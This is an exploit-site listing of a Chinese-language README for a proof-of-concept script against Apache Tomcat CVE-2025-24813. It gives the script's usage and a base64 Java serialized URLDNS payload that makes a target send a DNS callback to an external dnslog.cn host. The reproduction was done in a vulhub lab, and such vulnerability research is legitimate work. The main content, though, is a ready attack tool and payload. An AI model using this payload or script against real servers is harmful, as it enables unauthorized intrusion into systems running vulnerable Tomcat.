Exploit for Deserialization of Untrusted Data in Apache Tomcat CVE-2025-24813

Name: Exploit for Deserialization of Untrusted Data in Apache Tomcat CVE-2025-24813
Rating: 5 (104 reviews)

2025-04-05 | CVSS 9.8

## https://sploitus.com/exploit?id=4B309332-736C-5888-B9E1-829B5787E9D7
# CVE-2025-24813

简单复现分析了CVE-2025-24813，并且写了一个简单的利用脚本

```
usage: CVE-2025-24813.py [-h] -u URL [-d DATA]

CVE-2025-24813

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     URL
  -d DATA, --data DATA  base64_serial_data
```

示例

使用vulhub启动一个存在漏洞的服务，用urldns链子生成一个payload

```
rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAEDV6cXZxMy5kbnNsb2cuY250AABxAH4ABXQABGh0dHBweHNyABFqYXZhLmxhbmcuSW50ZWdlchLioKT3gYc4AgABSQAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAABeA==
```

执行如下

![image-20250405170549475](image/Readme/image-20250405170549475.png)

![image-20250405170605250](image/Readme/image-20250405170605250.png)